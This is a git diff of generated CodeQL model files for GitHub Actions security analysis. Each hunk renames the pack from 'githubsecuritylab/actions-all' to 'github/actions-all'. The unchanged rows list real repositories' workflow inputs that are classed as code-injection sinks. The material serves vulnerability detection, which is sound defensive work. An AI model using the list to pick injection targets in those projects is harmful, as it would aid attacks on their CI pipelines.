a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 0ee56c05777..e33a45e698b 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index f17216cf1e8..a2d5e1ef7a3 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 551010c6634..e0ae2bc70bd 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index bd64e336c17..7926fa4e083 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 7d545451867..2369c82bcb7 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index 1ad4a2b824d..d388b1a55b3 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index 60381d41f16..dade6e8c958 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index ac61ed797d5..9ac87054f10 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 7eed41f755e..3f9f3f63207 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index f977f6a5cce..aff068890ad 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index c4bacdc9c2c..0304e585bb6 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index f4ee4920797..46950d380cb 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 5fae95e5def..2e3c2530eba 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 4115d6c98f7..58f3d831423 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index 536b37131c1..dfa20e1f9d7 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index 54f72118d87..144c4e456dc 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index bed9ae53110..51348fb1b56 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index 7e9f4e14e85..c3fa787b288 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 3a16fc74bb6..9845c089b32 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 686f1013dd8..2986040e8cd 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 6a6cb61c174..7dafcd5b71b 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 513cd4d7644..1b5fb0e1d97 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 2855a6d4e01..28ec54f1d9d 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 78a2cc4e0ce..21f35339952 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 8db73d2fc77..594b0cc9bb9 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 8b0deda070d..a2fbd510bb2 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 3f7a7e7fda8..927cbd449e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 9746a118691..52037a671cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index 6208645b1b7..b71a87193b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index e66e7326701..24361a7d29e 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index 471ce3a672a..be71c38f124 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 1af30be9f35..889edaac1bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index ee3d9d0a8ef..b2b970152de 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index 493594e3b81..f885a44f46e 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index a437581ba83..10f06693d26 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 489e005cc0e..43d0fe1c2ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3a0e723e9f7..4fb13f0a18c 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 893be8a2725..96b73aa06de 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 75877fa48aa..554974bfe6f 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index 489e6134eba..f1c6ec345d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 4feef931f71..2cfa8a46c83 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index 189cd8bbafd..8c3c5a58502 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index 418694a596d..aa75ce39295 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index 10c4f8a3e3c..e9dd33c6f17 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 1837a505499..a0bd22ad352 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index 094e4602e8e..fb98c6a7d9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index ec264f96bf1..0c108422a94 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 7463396b152..c820724bd71 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 4c52a10d4f1..51d32bde4ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index a6c5a8b8e3b..b747a4a27df 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 286e75fc9e2..c5c26bc7926 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 9ea5a9a34c7..62a1a853937 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all 